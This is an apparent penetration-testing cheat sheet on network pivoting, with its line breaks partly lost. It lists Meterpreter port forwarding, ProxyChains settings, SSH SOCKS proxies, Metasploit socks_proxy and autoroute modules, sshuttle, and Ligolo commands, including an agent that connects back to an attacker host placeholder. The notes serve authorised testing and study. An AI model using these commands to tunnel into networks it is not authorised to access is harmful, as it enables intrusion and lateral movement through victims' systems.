# ATTACKER => REDIR => TARGET# NOTE: add "-L 0.0.0.0" to make the local port accessible from other machines next to ATTACKER (like a Windows box)portfwd add -l <ATTACKER_PORT> -r <TARGET_IP> -p <TARGET_PORT>
# Edit ProxyChains Config# NOTE: disable strict_chain to for robustnessls -la /etc/proxychains*.conf
[ProxyList]dynamic_chain
#strict_chainsocks5 127.0.0.1 1080# For Chiselsocks4 127.0.0.1 9050# For an SSH -D proxy
via SSH
# Step 1: create proxy via SSHssh -D 9050 <USER>@<TARGET>
# Step 1: Run MSF SOCKS proxyuse auxiliary/server/socks_proxy
set SRVPORT 9050set SRVHOST 0.0.0.0
set version 4a
#set version 5run -j
jobs
# Step 2a: in MSFuse post/multi/manage/autoroute
set SESSION <SESSION>
set SUBNET <TARGET_SUBNET>
run -j
jobs
route print
# OR Step 2b: in MSF sessionrun autoroute -s <TARGET_SUBNET>
run autoroute -p
Sshuttle
“Transparent proxy server that works as a poor man’s VPN. Forwards over ssh. Doesn’t require admin… Supports DNS tunneling.”
# ATTACKERsudo ./proxy -selfcert
# CLIENT./agent -connect <ATTACKER_IP>:11601 -ignore-cert
# ATTACKER: ligolo sessionsession 1start
# Back in Kali terminalsudo ip route add <SUBNET_TARGET> dev ligolo